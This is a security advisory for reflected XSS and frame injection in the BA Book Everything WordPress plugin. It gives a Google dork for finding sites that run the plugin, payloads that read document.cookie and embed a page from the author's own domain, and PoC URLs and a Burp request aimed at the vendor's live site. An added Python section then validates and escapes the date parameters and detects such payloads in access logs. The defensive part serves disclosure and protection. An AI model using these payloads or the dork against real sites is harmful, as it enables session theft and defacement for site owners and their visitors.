BA Book Everything WordPress plugin v1.3.24 - Unauthenticated Reflected XSS & XFS

2020.11.11
Ex.Mi (RU)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

[+] :: Exploit Title: BA Book Everything WordPress plugin v1.3.24 - Unauthenticated Reflected XSS & XFS
[+] :: Google Dork: inurl:/wp-content/plugins/ba-book-everything/
[+] :: Date: 2020-09-30
[+] :: Exploit Author: Ex.Mi [ https://ex-mi.ru ]
[+] :: Vendor: Booking Algorithms [ https://ba-booking.com ]
[+] :: Software Version: 1.3.24
[+] :: Software Link: https://wordpress.org/plugins/ba-book-everything/
[+] :: Tested on: Kali Linux
[+] :: CVE:
[+] :: CWE: CWE-79, CWE-1021

[i] :: Info: Unauthenticated Reflected XSS and XFS vulnerabilities were discovered in the BA Book Everything plugin v1.3.24 for WordPress. The date_from and date_to parameters of the search-result page are reflected into the response without sanitization. Vulnerable parameter(s): date_from, date_to.

[!] :: Affected Themes: Royalux [ by Secret Laboratory ] - https://themeforest.net/item/royalux-hotel-booking-wordpress-theme/27527508

[$] :: Payloads:
"><!--<img src="--><img src=x onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);//">
"><embed src=//ex-mi.ru/payload/xfsii.html></embed>

[!] :: PoC:
https://ba-booking.com/ba-book-everything/search-result/?date_from=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);//%22%3E&date_to=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.domain);//%22%3E

[!] :: PoC (Burp Suite):
GET /ba-book-everything/search-result/?date_from=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);//%22%3E&date_to=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.domain);//%22%3E HTTP/1.1
Host: ba-booking.com

[@] :: Contacts:
Website: ex-mi.ru
Telegram: @ex_mi
GitHub: @ex-mi
Medium: @ex-mi
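The root cause described above is a date parameter echoed back into an HTML attribute without validation or escaping. The following is an added example, written for this page and not code from the plugin or the advisory author, that shows the two defensive pieces a practitioner would want: a strict whitelist validator plus attribute escaping for the date_from/date_to values, and a small detector that flags requests to the search-result page whose date parameters are not dates but contain markup. The render functions, the log format and the log lines are constructed for illustration (the vulnerable variant only mirrors the reflection pattern the advisory implies, not the plugin's actual source).

```python
import re
from datetime import date
from html import escape
from urllib.parse import unquote_plus

# Whitelist: only ISO YYYY-MM-DD is acceptable for a booking date field.
DATE_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")


def validate_date_param(value):
    """Return a canonical YYYY-MM-DD string, or None if the value is not a real date."""
    if value is None or not DATE_RE.match(value):
        return None
    try:
        return date.fromisoformat(value).isoformat()
    except ValueError:  # e.g. month 13 or day 32
        return None


def render_date_input_unsafe(name, raw_value):
    """Hypothetical reflection pattern that enables the reported injection
    (the request value lands inside value="..." untouched)."""
    return f'<input type="text" name="{name}" value="{raw_value or ""}">'


def render_date_input(name, raw_value):
    """Hardened rendering: reject anything that is not a date, then escape
    whatever is echoed back (the WordPress equivalent would be esc_attr())."""
    clean = validate_date_param(raw_value) or ""
    return f'<input type="text" name="{name}" value="{escape(clean, quote=True)}">'


# Markers that never belong in a date value; used only to classify, not to block.
SUSPICIOUS = re.compile(r"<|>|on\w+\s*=|javascript:", re.I)
WATCHED_PARAMS = ("date_from", "date_to")


def _query_params(url):
    """Minimal, version-independent query parser: split on & and = only."""
    if "?" not in url:
        return {}
    params = {}
    for pair in url.split("?", 1)[1].split("&"):
        key, _, val = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(val))
    return params


def flag_search_requests(log_lines):
    """Scan combined-format access log lines; return (client_ip, param, snippet)
    for date parameters on the search-result page that are not valid dates and
    carry markup."""
    findings = []
    for line in log_lines:
        parts = line.split('"')
        if len(parts) < 2:
            continue
        fields = parts[1].split()  # ["GET", "/path?query", "HTTP/1.1"]
        if len(fields) < 2:
            continue
        url = fields[1]
        if "search-result" not in url.split("?", 1)[0]:
            continue
        client_ip = line.split()[0]
        for param in WATCHED_PARAMS:
            for value in _query_params(url).get(param, []):
                if validate_date_param(value) is None and SUSPICIOUS.search(value):
                    findings.append((client_ip, param, value[:40]))
    return findings


# Constructed sample log lines (combined format); the first reuses the
# advisory's payload shape in date_from, the others are benign traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Nov/2020:10:15:32 +0000] "GET /ba-book-everything/search-result/'
    '?date_from=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(document.cookie)//%22%3E'
    '&date_to=2020-11-12 HTTP/1.1" 200 5123',
    '198.51.100.7 - - [11/Nov/2020:10:16:01 +0000] "GET /ba-book-everything/search-result/'
    '?date_from=2020-11-11&date_to=2020-11-12 HTTP/1.1" 200 5123',
    '198.51.100.8 - - [11/Nov/2020:10:16:40 +0000] "GET /ba-book-everything/search-result/'
    '?date_from=next+week&date_to= HTTP/1.1" 200 5123',
    '192.0.2.9 - - [11/Nov/2020:10:17:05 +0000] "GET /wp-login.php HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, param, snippet in flag_search_requests(SAMPLE_LOG):
        print(f"{ip} sent markup in {param}: {snippet!r}")
```

The validator is deliberately stricter than escaping alone: a date field has a known shape, so anything else is dropped before rendering, and escaping remains as the second layer in case the value is ever reflected elsewhere. The detector treats a non-date value without markup (such as "next week") as noise rather than an attack, which keeps the alert volume low when run against real traffic.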

References:

https://ex-mi.ru/exploit/%5B2020-09-30%5D-%5BWordPress%5D-ba-book-everything-plugin-v1.3.24.txt
https://github.com/ex-mi/ex-mi.github.io/blob/main/exploit/%5B2020-09-30%5D-%5BWordPress%5D-ba-book-everything-plugin-v1.3.24.txt
https://wordpress.org/plugins/ba-book-everything/


Copyright 2020, cxsecurity.com